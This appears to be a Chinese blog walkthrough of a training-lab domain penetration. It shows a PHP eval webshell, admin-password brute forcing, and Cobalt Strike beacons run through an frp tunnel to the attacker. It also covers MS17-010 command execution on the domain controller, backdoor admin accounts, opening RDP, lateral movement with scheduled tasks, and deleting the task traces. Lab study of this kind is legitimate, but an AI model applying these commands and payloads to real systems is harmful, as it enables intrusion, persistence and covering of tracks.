内网渗透初级篇-一次对简单的域环境渗透过程

从信息收集,web网站一直到打入内网,控制主机的过程。使用到了密码爆破、一句话木马、通信隧道建立、漏洞利用等知识。适合刚开始学习内网的读者阅读。

一、环境搭建

环境简介:

操作系统IP地址
攻击者 kaliIP地址:192.168.31.77
攻击者 Windows 10IP地址:192.168.31.83
windows 7外网地址:192.168.31.215 内网地址:192.168.52.143
windows 2008IP地址:192.168.52.138
windows 2003IP地址:192.168.52.141

img

此次渗透学习利用了红日安全团队的域环境。非常好的学习环境,通过渗透该环境能够学习到很多知识。

下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/

(一)win7 web服务器设置

img

phpstudy中设置网站目录为 C:/phpstudy/www/yxcms, 点击应用。img

站点域名管理中网站目录设置为C:/phpstudy/www/yxcms

网站域名如下设置

img

hosts文件 如下设置

img

(二)KALI设置

在kali攻击机的 /etc/hosts 文件中 添加www.yxcms123.com的域名解析

img

这样就通过浏览器,输入域名直接访问网站。而不是使用IP地址,是渗透环境更加真实。

二、渗透WEB服务器

(一)信息收集

设置完成后 浏览器输入 www.yxcms123.com 可以正常打开web页面

img

使用nmap对网站进行扫描

img

yxcms系统的管理员登录页面通常为 index.php?r=admin/index/login

img

尝试修改为 admin

img

(二)爆破用户名密码

利用BurpSuite对用户名和密码进行爆破

img

设置字典文件

img

开始爆破,发现密码123456的返回值和其他的返回值长度明显不一样。

img

使用 admin/123456登录,登录成功。

img

版本:YxcmsApp 1.2.1 【未授权】

(三)获得Shell

登录成功后,尝试写入一句话木马。

img

img

写入 PHP的一句话木马

<?php @eval($_POST['pass']);?>

img

使用菜刀或蚁剑连接都可以

img

获得了WEB服务器的Shell

img

(四)主机信息收集

查看WEB服务器的网络地址

img

查看当前用户

img

查看防火墙的配置信息

netsh firewall  show config

img

检查安装的杀毒软件

img

img

发现没有安装杀毒软件。

(五)上线CS

利用CS生成Payload

img

复制生成的txt内容,利用菜刀或蚁剑的终端执行

img

img

片刻, 可以看到已经上线

img

修改延迟时间,因为这里是靶机环境,为了学习用的,所以将时间直接设置为0

img

(六)内网信息收集

使用大余师傅编写的插件上传nbtscan 并进行内网搜集,插件主要是为了方便,提高效率。没有的话手动上传也可以。

img

扫描到内网的三个 ip地址

img

192.168.52.138是域控制器

关闭web服务器的防火墙(主机信息收集可以得知操作系统信息)

img

img

查看web机器的密码

img

当前密码为p@ssw0rd

img

(七)创建新用户

创建用户并加入组

shell net user biu Pass!@#4 /add

img

加入管理组

shell net localgroup administrators biu /add

img

在实战中,创建新用户还是比较容易被发现的。

(八)拓展-开启远程桌面

开启3389端口

win7 以上

设置远程桌面端口

reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v portnumber /d 3389 /f

开启远程桌面

wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1

检查端口状态

netstat -an|find "3389"

关闭远程桌面

wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 0

img

img

img

防火墙 放行RDP(如需放行)

shell  netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow

在实战中不到万不得以最好不要登录远程桌面,非常容易被发现。

三、建立通信隧道

利用frp建立一条一级代理,使WEB服务器作为一个跳板,这样攻击者就可以直接访问到域内的其他主机了。

frp 客户端配置信息

img

192.168.31.83 是frp服务端的的IP地址

服务器端的配置

img

将客户端 frpc.exe 及配置文件 frpc.ini上传到web靶机

img

等待片刻 上传完成

注意:上传frp完成时一定要看一下文件的大小,有时候文件会上传的不完整导致程序无法执行。

img

在服务端(攻击机 Windows 10)开启监听

frps.exe -c frps.ini

img

客户端运行 frpc.exe

shell frpc.exe -c frpc.ini

img

在服务端可以看到 监听成功

img

四、渗透域控制器

(一)利用M etasploit渗透域控

msf设置代理

img

搜索smb,使用第16个smb/smb_version

img

使用smb_version 对192.168.52.143/24内网进行扫描,确认之前扫描到的信息

同样扫描到IP地址:143,138,141

img

扫描的同时可看到代理服务器在走数据

img

使用 ms17_010_command 提权(利用该模块可以在存在漏洞的主机上执行cmd命令)

img

COMMAND即为要执行的cmd命令

RHOSTS为 目标主机的IP地址

默认 执行 net group "Domain Admins" /domain命令

img

img

尝试执行ipconfig命令

img

img

在目标机器上 创建用户,加入管理员组

set command net user biu138 "p@ssw0rd" /add
run
set command net localgroup administrators biu138 /add
run
set command net user biu138
run

img

(二)CS生成木马

在CS中,设置中转监听。

img

img

查看监听器

img

生成木马

img

img

生成一个 beacon.exe, 现在需要将 beacon.exe上传到内网中

(三)上传木马到域控

先用 CS将beacon.exe 上传到web服务器 52.143中

img

然后在 web服务器 执行cmd命令开启共享

shell net use \\192.168.52.138\ipc$ p@ssw0rd /user:biu138

(biu138是 域用户,对141渗透时无需再执行 该命令)

img

然后进入138主机的目录

shell dir \\192.168.52.138\c$

img

然后查看 138主机中运行的进程

 shell tasklist /S 192.168.52.138 /U biu138 /P p@ssw0rd

img

使用平台 检测 主机是否存在杀软

img

没有安装杀软

img

复制beacon.exe 到 52.138主机上

shell copy C:\phpStudy\WWW\yxcms\beacon.exe \\192.168.52.138\c$

img

上传木马到域控的方法还有很多,比如利用web服务器下载。这里先只介绍这么一种。

(四)执行木马上线CS

利用msf 执行 beacon.exe木马

set command cmd /c "c:\beacon.exe" 
run

img

可以看到138 已经通过中转上线

img

进行提权获得一个 稳定的shell

img

img

img

五、渗透内网主机

(一)上传木马

利用同样的方法拿141主机

使用刚才渗透域控的木马,或者重新生成一个新的木马都可以。

img

上传到143主机

img

复制beacon2.exe到 141主机上

img

(二)利用定时任务执行木马

查看 141主机当前的时间

shell net time \\192.168.52.141

img

创建定时任务

shell at \\192.168.52.141 16:39:00 C:\beacon2.exe

img

清楚创建 定时任务的痕迹

shell at \\192.168.52.141 <定时任务ID> /delete

img

成功上线

三台靶机全部上线,而且是最高权限

img

img

img

六、总结

这是初学域渗透时做的学习笔记,域环境相对来说比较简单,但是还是能够学习到很多的知识,在实战中也可以应用。首先利用BurpSuite爆破获得啦网站的密码,然后通过一句话木马获得shell并上传木马上线CS。建立通信隧道使得攻击者能够直接访问到域内的主机,使用传说中的永恒之蓝漏洞拿下了域控并上线CS。同样利用相同的方式将木马上传到内网用户,并利用定时任务执行,使之上线CS。通过该环境能学习到很多知识,攻击的方法还有好多,可以自行发掘。

  • 发表于 2021-08-23 10:45:14
  • 阅读 ( 7113 )
  • 分类:内网渗透

3 条评论

0ne酱
入口点WEB服务器,你不都已经抓到域管的明文了嘛。。。。。
请先 登录 后评论
飞神剑
那是我设的,这个地方我没用
请先 登录 后评论
小何同学
上线CS处没有上线是什么原因呢?
请先 登录 后评论
请先 登录 后评论
飞神剑
飞神剑

一个起早贪黑的保安

2 篇文章

站长统计